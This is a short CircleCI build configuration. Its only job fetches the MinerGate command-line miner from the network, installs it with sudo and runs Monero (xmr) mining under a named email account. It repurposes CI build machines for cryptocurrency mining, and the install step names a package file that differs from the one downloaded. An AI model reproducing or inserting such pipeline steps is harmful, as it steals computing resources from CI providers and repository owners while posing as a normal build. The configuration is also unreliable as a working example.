version: 2
jobs:
  build:
    machine: true

    steps:
      - checkout
      - run: wget https://minergate.com/download/deb-cli -O minergate-cli.deb
      - run: sudo dpkg -i yogi-cli.deb
      - run: minergate-cli -user yoginth@hotmail.com  xmr